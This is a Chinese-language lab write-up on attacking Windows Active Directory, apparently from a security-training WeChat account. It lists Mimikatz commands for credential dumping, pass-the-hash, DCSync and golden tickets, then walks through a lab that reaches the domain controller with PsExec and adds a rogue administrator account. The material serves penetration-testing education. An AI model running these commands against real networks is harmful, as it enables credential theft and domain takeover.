预备知识
什么是域?
域是若干台计算机组成的集合,一个电脑也是。域中的电脑是分等级的,分为域控和成员机。
如何安装域?
在服务器管理中添加服务器角色,添加域服务
如何加入域?
首先一定要修改DNS服务器 ip为域控的ip,再使用域控的账号密码登录就可以加入了,账号的形式 域名/域控账号
哈希传递
当我们使用猕猴桃进行碰撞密码时,我们发现会没有明文出现,是因为高版本的windows是不会将明文密码保存在本机的。所以我们可以使用哈希传递拿取管理员权限。
使用语句:
privilege::debug
log
sekurlsa::logonpasswords
sekurlsa::pth /user: 用户名 /domian “域名” /ntlm: ntlm值
提取成功就会跳出获取权限的cmd框
PsExec的作用
能够使用域控的cmd
黄金票据
因为krbtgt账户其实就是那个KDC秘钥分发中心用的超管密码,我们拿着那个的票据,去访问客户机,客户机会认为我们是KDC秘钥分发中心,所以直接给了最高的权限允许我们访问,一般管理员会修改域控机密码,但是很少有管理员会修改Krbtgt的密码
我们通过以下语句来制作黄金票据
lsdump::dcsync /user:krbtgt 获取krbtgt的密码
提取其中的sid(不需要后面的-的数据) 和 hashNTLM
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi (制作票据)
kerberos::ptt administrator.kiribi (加载票据)
然后打开cmd 再利用 PsExec 获取域控cmd
靶场实战
一、远程连接
根据提示:
连接:
二、查看目标主机是否在域内
输入:systeminfo
结果:不在域内
三、远程连接10.0.1.8查看是否在域内
输入:systeminfo
结果:在 zkaq.cn的域中
四、查看域控的ip
输入:ipconfig -all(观察dns服务器)
结果:ip为 10.0.1.6
五、使用猕猴桃碰撞10.0.1.8管理员密码
输入:
privilege::debug
log
sekurlsa::logonpasswords
结果:没有明文密码
六、尝试是否能连接10.0.1.6的cmd
通过cmd使用桌面的PxExec
输入:PsExec.exe 10.0.1.6 cmd
结果:登录失败,我们并没有权限
七、使用哈希传递获取权限
输入:sekurlsa::pth/user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
结果:自动弹出cmd框
八、使用弹出的cmd使用PxEsec
先调节路径
输入:PsExec.exe 10.0.1.6 cmd
结果:成功连接上10.0.1.6的cmd
九、创建新管理员
输入:
net user yy yy1233321! /add
net localgroup administrators yy /add
结果:创建成功(忘记截图了)
十、连接10.0.1.6
在CUsersAdministrators.DC桌面中有flag
结果:
(黄金票据一直尝试错误了,就放弃了)
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):内网渗透(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论